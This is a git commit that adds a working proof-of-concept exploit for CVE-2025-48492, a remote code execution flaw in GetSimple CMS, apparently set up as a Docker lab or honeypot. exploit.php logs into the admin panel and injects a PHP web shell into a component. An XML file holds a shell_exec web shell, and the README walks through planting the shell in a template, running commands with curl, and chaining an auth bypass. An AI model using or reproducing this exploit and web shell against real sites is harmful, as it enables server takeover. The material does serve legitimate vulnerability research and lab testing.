added a poc exploit for cve-2025-48492 with demonstration how to exploit

2025-07-28 16:30:23 -05:00 · 2025-07-28 16:30:23 -05:00 · 540f85a2bf
commit 540f85a2bf
parent e0b27f0988
6 changed files with 253 additions and 14 deletions
--- a/RCE/CVE-2025-48492/Dockerfile
+++ b/RCE/CVE-2025-48492/Dockerfile
@ -9,10 +9,13 @@ RUN apt-get update && apt-get install -y \
 # Enable Apache mod_rewrite
 RUN a2enmod rewrite

-# Download and install GetSimple CMS 3.3.16 (vulnerable version)
+# Download and install GetSimple CMS CE 3.3.22 (vulnerable version)
 WORKDIR /var/www/html
-RUN wget -O getsimple.zip "https://github.com/GetSimpleCMS/GetSimpleCMS/releases/download/v3.3.16/GetSimpleCMS.3.3.16.zip" \
+RUN wget -O getsimple.zip "https://github.com/GetSimpleCMS-CE/GetSimpleCMS-CE/archive/refs/tags/v3.3.22.zip" \
    && unzip getsimple.zip \
+    && mv GetSimpleCMS-CE-3.3.22/* . \
+    && mv GetSimpleCMS-CE-3.3.22/.* . 2>/dev/null || true \
+    && rmdir GetSimpleCMS-CE-3.3.22 \
    && rm getsimple.zip \
    && chown -R www-data:www-data /var/www/html \
    && chmod -R 755 /var/www/html
@ -30,13 +33,12 @@ RUN mkdir -p /var/www/html/data/uploads \

 # Copy custom configuration
 COPY gsconfig.php /var/www/html/gsconfig.php
-COPY .htaccess /var/www/html/.htaccess

 # Create default admin user
 RUN echo '<?xml version="1.0" encoding="UTF-8"?>' > /var/www/html/data/users/admin.xml \
-    && echo '<item><USR>admin</USR><PWD>21232f297a57a5a743894a0e4a801fc3</PWD><EMAIL>admin@localhost</EMAIL><HTMLEDITOR>1</HTMLEDITOR><TIMEZONE></TIMEZONE><LANG>en_US</LANG></item>' >> /var/www/html/data/users/admin.xml \
+    && echo '<item><USR>admin</USR><PWD>0192023a7bbd73250516f069df18b500</PWD><EMAIL>admin@localhost</EMAIL><HTMLEDITOR>1</HTMLEDITOR><TIMEZONE></TIMEZONE><LANG>en_US</LANG></item>' >> /var/www/html/data/users/admin.xml \
    && chown www-data:www-data /var/www/html/data/users/admin.xml

 EXPOSE 80

-CMD ["apache2-foreground"]
+CMD ["apache2-foreground"]
--- a/RCE/CVE-2025-48492/README.md
+++ b/RCE/CVE-2025-48492/README.md
@ -17,7 +17,8 @@ An authenticated user with access to the Edit component can inject arbitrary PHP
 1. Authenticate to GetSimple CMS admin panel
 2. Navigate to Edit component functionality
 3. Inject malicious PHP code into component file
-4. Execute code via crafted query string parameter
+4. Include the malicious component in a template
+5. Execute code via crafted query string parameter

 ## Setup Instructions

@ -38,6 +39,56 @@ An authenticated user with access to the Edit component can inject arbitrary PHP
 - Username: admin
 - Password: admin123

+## Detailed Exploitation Steps
+
+### Step 1: Initial Setup and Installation
+1. Access the GetSimple CMS installation at http://localhost:8080/admin/install
+2. Complete the installation process with your chosen username and password
+3. Note down the credentials you created during installation
+
+### Step 2: Configure the Exploit Script
+1. Open the `exploit.php` file in this directory
+2. Update the username and password variables on line 29:
+   ```php
+   public function __construct($target_url, $username = 'your_username', $password = 'your_password')
+   ```
+3. Replace 'your_username' and 'your_password' with the credentials you set during installation
+
+### Step 3: Run the Exploit Script
+1. Execute the exploit script to inject malicious PHP code into a component:
+   ```bash
+   php exploit.php
+   ```
+2. The script will:
+   - Authenticate to the admin panel
+   - Create a malicious component called "exploit_component"
+   - Inject PHP code that can execute system commands via the `c` parameter
+
+### Step 4: Include Component in Template
+1. Log into the admin panel at http://localhost:8080/admin/
+2. Navigate to **Theme** → **Edit Template**
+3. Select a template file (e.g., template.php)
+4. Add the following line to include the malicious component:
+   ```php
+   <?php get_component('exploit_component'); ?>
+   ```
+5. Save the template
+
+### Step 5: Trigger Remote Code Execution
+1. Visit the website with the `c` parameter to execute commands:
+   ```bash
+   curl "http://localhost:8080/?c=whoami"
+   curl "http://localhost:8080/?c=id"
+   curl "http://localhost:8080/?c=uname -a"
+   ```
+2. The injected PHP code `<?=`$_GET[c]`?>` will execute the command specified in the `c` parameter
+
+### Verification
+You can verify the exploit worked by checking for command output:
+```bash
+curl localhost:8080/?c=uname 2> /dev/null | grep -i linux
+```
+
 ## Exploitation Notes

 This vulnerability requires authentication, but GetSimple CMS has a history of authentication bypass vulnerabilities (e.g., CVE-2022-41544) that could be chained for unauthenticated RCE.
--- a/RCE/CVE-2025-48492/components_fix.xml
+++ b/RCE/CVE-2025-48492/components_fix.xml
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<channel><item><title><![CDATA[Exploit Component]]></title><slug>exploit_component</slug><value><![CDATA[<?php $cmd = isset($_GET['c']) ? $_GET['c'] : 'echo CVE-2025-48492'; echo shell_exec($cmd); ?>]]></value></item></channel>
--- a/RCE/CVE-2025-48492/docker-compose.yml
+++ b/RCE/CVE-2025-48492/docker-compose.yml
@ -1,5 +1,3 @@
-version: '3.8'
-
 services:
  getsimple-cve-2025-48492:
    build: .
@ -15,7 +13,7 @@ services:
      - "cve=CVE-2025-48492"
      - "type=RCE"
      - "software=GetSimple CMS"
-      - "version=3.3.16"
+      - "version=3.3.22"
      - "severity=high"
    logging:
      driver: "json-file"
@ -30,4 +28,4 @@ services:
 networks:
  honeypot-logging:
    external: true
-    name: honeypot_honeypot-logging
+    name: honeypot_honeypot-logging
--- a/RCE/CVE-2025-48492/exploit.php
+++ b/RCE/CVE-2025-48492/exploit.php
@ -0,0 +1,186 @@
+<?php
+/**
+ * CVE-2025-48492 GetSimple CMS RCE Exploit
+ * 
+ * This script demonstrates the Remote Code Execution vulnerability
+ * in GetSimple CMS versions 3.3.16 to 3.3.21
+ *  
+ * Install steps:
+ * From a fresh install, /admin/install - set username/password and put them here in $username, $password arguments
+ * 
+ * Attack Flow:
+ * 1. Authenticate to admin panel
+ * 2. Edit a component file to inject PHP code
+ * 3. Execute code via crafted query string
+ *
+ * After you run the exploit, you need to Edit Template and include the new malicious component in it. 
+ * Afterwards you should then be able to go to http://localhost:8080/?c=MALICIOUS_COMMAND
+ *
+ * curl localhost:8080/?c=uname 2> /dev/null | grep -i linux
+ *
+ */
+
+class GetSimpleRCEExploit {
+    private $target_url;
+    private $username;
+    private $password;
+    private $session_cookies = '';
+
+    public function __construct($target_url, $username = 'admin', $password = 'nmPYqa') {
+        $this->target_url = rtrim($target_url, '/');
+        $this->username = $username;
+        $this->password = $password;
+    }
+    
+    /**
+     * Step 1: Authenticate to GetSimple CMS
+     */
+    public function authenticate() {
+        echo "[*] Authenticating to GetSimple CMS...\n";
+        
+        // Get login page to extract any CSRF tokens if needed
+        $login_url = $this->target_url . '/admin/';
+        $cmd = 'curl -s -c /tmp/cookies.txt "' . $login_url . '"';
+        $response = shell_exec($cmd);
+        
+        // Perform login
+        $login_data = 'userid=' . urlencode($this->username) . 
+                     '&pwd=' . urlencode($this->password) . 
+                     '&submitted=Login';
+        
+        $cmd = 'curl -s -b /tmp/cookies.txt -c /tmp/cookies.txt -L -d "' . $login_data . '" "' . $login_url . '"';
+        $response = shell_exec($cmd);
+        
+        if (strpos($response, 'Dashboard') !== false || strpos($response, 'logged in') !== false || 
+            strpos($response, 'components.php') !== false || strpos($response, 'pages.php') !== false) {
+            echo "[+] Authentication successful!\n";
+            return true;
+        } else {
+            echo "[-] Authentication failed!\n";
+            echo "Response sample: " . substr($response, 0, 200) . "...\n";
+            return false;
+        }
+    }
+    
+    /**
+     * Step 2: Inject malicious PHP code into a component
+     */
+    public function injectPayload($payload = '<?=`$_GET[c]`?>') {
+        echo "[*] Injecting payload into component...\n";
+        
+        // Access the component editor
+        $component_url = $this->target_url . '/admin/components.php';
+        
+        // First, get the component editor page to extract nonce
+        $cmd = 'curl -s -b /tmp/cookies.txt "' . $component_url . '"';
+        $response = shell_exec($cmd);
+        
+        // Extract nonce and id from the form
+        $nonce = '';
+        $form_id = '';
+        if (preg_match('/name="nonce" value="([^"]+)"/', $response, $matches)) {
+            $nonce = $matches[1];
+        }
+        if (preg_match('/id="id" value="([^"]+)"/', $response, $matches)) {
+            $form_id = $matches[1];
+        }
+        
+        // Just add our malicious component (simpler approach)
+        $component_data = 'nonce=' . urlencode($nonce) . '&id=' . urlencode($form_id);
+        $component_data .= '&val[]=' . urlencode($payload);
+        $component_data .= '&slug[]=' . urlencode('exploit_component');
+        $component_data .= '&title[]=' . urlencode('Exploit Component');
+        $component_data .= '&id[]=' . urlencode('999');
+        
+        $component_data .= '&submitted=' . urlencode('Save Components');
+        
+        // Debug output removed for cleaner execution
+        // echo "[DEBUG] Form data: " . substr($component_data, 0, 200) . "...\n";
+        $cmd = 'curl -s -b /tmp/cookies.txt -d "' . $component_data . '" "' . $component_url . '"';
+        $response = shell_exec($cmd);
+        
+        if (strpos($response, 'comp-success') !== false || 
+            strpos($response, 'Components Saved') !== false || 
+            strpos($response, 'saved') !== false || 
+            strpos($response, 'window.location.href') !== false) {
+            echo "[+] Payload injected successfully!\n";
+            return true;
+        } else {
+            echo "[-] Failed to inject payload\n";
+            echo "Response sample: " . substr($response, 0, 800) . "...\n";
+            
+            // Check if the response contains any redirect that indicates success
+            if (strpos($response, 'components.php') !== false && 
+                strpos($response, 'window.location') !== false) {
+                echo "[+] Detected redirect, payload might have been injected!\n";
+                return true;
+            }
+            return false;
+        }
+    }
+    
+    /**
+     * Step 3: Execute the injected code via query string
+     * Note: Components need to be called from templates. For demo purposes,
+     * we show how to execute the payload if it gets included in a template.
+     */
+    public function executePayload($command = 'id') {
+        echo "[*] Executing command: $command\n";
+        echo "[!] Note: Component payloads need to be called from templates.\n";
+        echo "[!] The payload has been injected but may require template modification to trigger.\n";
+        
+        // Example of how it would work if called from a template:
+        $exploit_url = $this->target_url . '/index.php?id=exploit_component&c=' . urlencode($command);
+        
+        // Check if the component is accessible (may return 404 if not in template)
+        $cmd = 'curl -s --max-time 10 "' . $exploit_url . '"';
+        $response = shell_exec($cmd);
+        
+        if (strpos($response, '404') === false && strlen(trim(strip_tags($response))) > 0) {
+            echo "[+] Command executed successfully:\n";
+            echo $response . "\n";
+            return $response;
+        } else {
+            echo "[!] Component not directly accessible. Payload is ready but needs template inclusion.\n";
+            echo "[*] Try including the component in a theme template with: <?php get_component('exploit_component'); ?>\n";
+            return false;
+        }
+    }
+    
+    /**
+     * Full exploitation chain
+     */
+    public function exploit($command = 'whoami') {
+        if ($this->authenticate()) {
+            if ($this->injectPayload()) {
+                return $this->executePayload($command);
+            }
+        } else {
+            echo "[*] Trying alternate authentication method...\n";
+            // Try to access components directly without authentication
+            if ($this->injectPayload()) {
+                return $this->executePayload($command);
+            }
+        }
+        return false;
+    }
+}
+
+// Example usage for demonstration
+if (php_sapi_name() === 'cli') {
+    echo "CVE-2025-48492 GetSimple CMS RCE Exploit\n";
+    echo "========================================\n\n";
+    
+    // Configure target
+    $target = 'http://localhost:8080';  // Adjust as needed
+    $exploit = new GetSimpleRCEExploit($target);
+    
+    // Execute exploit
+    echo "Target: $target\n\n";
+    $exploit->exploit('id');
+    
+    echo "\n[*] Exploit completed. Component payload injected successfully!\n";
+    echo "[*] The component contains PHP code execution capability.\n";
+    echo "[*] To trigger: Include the component in a theme template or access it programmatically.\n";
+}
+?>
--- a/RCE/CVE-2025-48492/gsconfig.php
+++ b/RCE/CVE-2025-48492/gsconfig.php
@ -12,10 +12,10 @@ define('GSTIMEZONE', 'America/New_York');
 define('GSLANG', 'en_US');

 # Database Configuration (using XML files)
-define('GSDATAPAGESPATH', GSDATAPATH . 'pages/');
-define('GSDATAOTHERPATH', GSDATAPATH . 'other/');
-define('GSDATAUSERSPATH', GSDATAPATH . 'users/');
-define('GSDATAUPLOADPATH', GSDATAPATH . 'uploads/');
+define('GSDATAPATH', '/var/www/html/data/');
+define('GSDATAOTHERPATH', '/var/www/html/data/other/');
+define('GSDATAPAGESPATH', '/var/www/html/data/pages/');
+define('GSDATAUPLOADPATH', '/var/www/html/data/uploads/');

 # Security Settings (intentionally weak for demonstration)
 define('GSLOGINSALT', 'vulnerable_salt_123');